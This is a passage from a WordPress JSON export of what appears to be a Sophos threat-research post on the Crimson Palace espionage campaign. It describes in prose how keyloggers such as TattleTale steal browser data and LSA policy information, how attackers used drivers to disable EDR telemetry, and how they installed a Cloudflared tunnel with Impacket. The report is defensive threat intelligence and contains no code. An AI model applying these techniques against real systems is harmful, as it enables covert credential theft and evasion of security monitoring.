with additional capabilities. We observed use of this tool as early as August 2023 but were previously unable to capture a sample. The keyloggers were deployed against specific administrative user accounts and other accounts of interest.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">TattleTale was deployed as the file r2.exe and was written to disk by identity_helper.exe. According to analysis by Sophos X-Ops, the malware can fingerprint the compromised system and enumerate mounted physical and network drives by impersonating a logged-on user. TattleTale also collects the domain controller name and retrieves Local Security Authority (LSA) policy information (the data returned by LsaQueryInformationPolicy), which covers password policies and security settings and can sometimes include cached passwords. Beyond keystrokes, TattleTale collects browser storage data from Edge and Chrome, saving everything it gathers into a .pvk file named after the victim organization. 
The output path is hardcoded into the sample, so the output directory will potentially vary from sample to sample.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<figure id=\"attachment_957278\" aria-describedby=\"caption-attachment-957278\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957278 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png\" alt=\"Figure 5: A screenshot of the TattleTale malware command line.\u00a0\" width=\"640\" height=\"356\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png 1140w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png?resize=300,167 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png?resize=768,428 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png?resize=1024,570 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957278\" class=\"wp-caption-text\"><em>Figure 5: A screenshot of the TattleTale malware command line<\/em><\/figcaption><\/figure>\n<p><span data-contrast=\"auto\">The actors deployed the keylogger r1.exe alongside two drivers, C:\\users\\public\\rsndispot.sys and C:\\users\\public\\kl.sys, to temporarily disable EDR telemetry. r1.exe is executed by a file named 2.bat and establishes communications to a loopback address. 
r1.exe then accesses protected Chrome database files.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">On the same target admin system, the actors also deployed another keylogger (\u2018c:\\users\\public\\dd.dat\u2019), the output of which would be saved as .dat files (\u2018C:\\Users\\Public\\log.dat\u2019).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">June 2024: Cloudflared<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">On June 13, in another move more reminiscent of cybercrime intrusions, the actors used Impacket to install the Cloudflared tunnel client on a single device. Prior to the installation, they were able to disable endpoint telemetry from the targeted device, so the deployment of the tunnel went unreported until incident response reactivated endpoint protection later that month.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h2><span data-contrast=\"none\">(No) Conclusion<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">The intrusions and activities documented in this report continue. We continue to see signs of the threat activity clusters we identified in our initial report as they attempt to penetrate other networks of Sophos customers in the same region.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Throughout the engagement, the adversary appeared to continually test and refine their techniques, tools, and practices. 
As we deployed countermeasures for their bespoke malware, they combined their custom-developed tools with generic, open-source tools often used by legitimate penetration testers, testing different combinations.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This cyberespionage campaign was uncovered through Sophos MDR&#8217;s human-led threat hunting service, which plays a critical role in proactively identifying threat activity. In addition to augmenting MDR operations, the MDR threat hunting service feeds into our X-Ops malware analysis pipeline to provide enriched protection and detections.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The investigation into the campaign demonstrates the importance of an efficient intelligence cycle, outlining how a threat hunt spawned from a raised detection can generate intelligence to develop new detections and jump-start additional hunts.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Indicators of compromise for this additional Crimson Palace activity are available on the Sophos GitHub page <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/crimson_palace_2.csv\">here<\/a>. 
<span class=\"ui-provider a b c d e f g h i j k l m n o p q r s t u v w x y z ab ac ae af ag ah ai aj ak\" dir=\"ltr\">For an in-depth look at the threat hunting behind this nearly two-year long cyber espionage campaign, sign up for the webinar, &#8220;<a id=\"menur4j4\" class=\"fui-Link ___1rxvrpe f2hkw1w f3rmtva f1ewtqcl fyind8e f1k6fduh f1w7gpdv fk6fouc fjoy568 figsok6 f1hu3pq6 f11qmguv f19f4twv f1tyq0we f1g0x7ka fhxju0i f1qch9an f1cnd47f fqv5qza f1vmzxwi f1o700av f13mvf36 f1cmlufx f9n3di6 f1ids18y f1tx3yz7 f1deo86v f1eh06m1 f1iescvh fhgqx19 f1olyrje f1p93eir f1nev41a f1h8hb77 f1lqvz6u f10aw75t fsle3fq f17ae5zn\" title=\"https:\/\/events.sophos.com\/operation-crimson-palace\/\" href=\"https:\/\/events.sophos.com\/operation-crimson-palace\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"Link Intrigue of the Hunt: Operation Crimson Palace: Unveiling a Multi-Headed State-Sponsored Campaign\">Intrigue of the Hunt: Operation Crimson Palace: Unveiling a Multi-Headed State-Sponsored Campaign<\/a>.&#8221; \u00a0<\/span><\/span><\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/09\/10\/crimson-palace-new-tools-tactics-targets\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/shutterstock_2458057241.jpg\"\/><\/p>\n<p><strong>Credit to Author: gallagherseanm| Date: Tue, 10 Sep 2024 10:00:54 +0000<\/strong><\/p>\n<p>Chinese cyberespionage campaign renews efforts in multiple organizations in Southeast Asia, blending tactics and expanding 
efforts\u00a0<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[31504,27718,31878,31506,129,31879,24552,27030,31509,16771,31880],"class_list":["post-25195","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-backdoordiplomacy","tag-chinese-apt","tag-crimson-palace","tag-earth-longzhi","tag-featured","tag-ref5961","tag-security-operations","tag-sophos-x-ops","tag-ta428","tag-threat-research","tag-unfading-sea-haze"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/25195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=25195"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/25195\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=25195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=25195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=25195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}